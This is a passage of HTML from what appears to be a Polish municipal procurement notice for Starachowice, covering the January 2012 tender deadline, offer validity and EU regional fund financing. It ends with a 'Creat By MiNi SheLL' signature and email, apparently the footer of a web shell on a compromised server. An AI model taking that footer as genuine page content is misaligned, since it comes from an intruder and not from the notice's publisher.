27- 200 Starachowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.01.2012 godzina 10:30, miejsce: Urząd Miejski Biuro Obsługi Mieszkańców (parter) ul. Radomska 45
27- 200 Starachowice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane jest z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013  w osi priorytetowej 6 - Wzmocnienie ośrodków miejskich i rewitalizacja małych miast, działanie 6.1 - Wzmocnienie regionalnych i sub-regionalnych ośrodków wzrostu..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com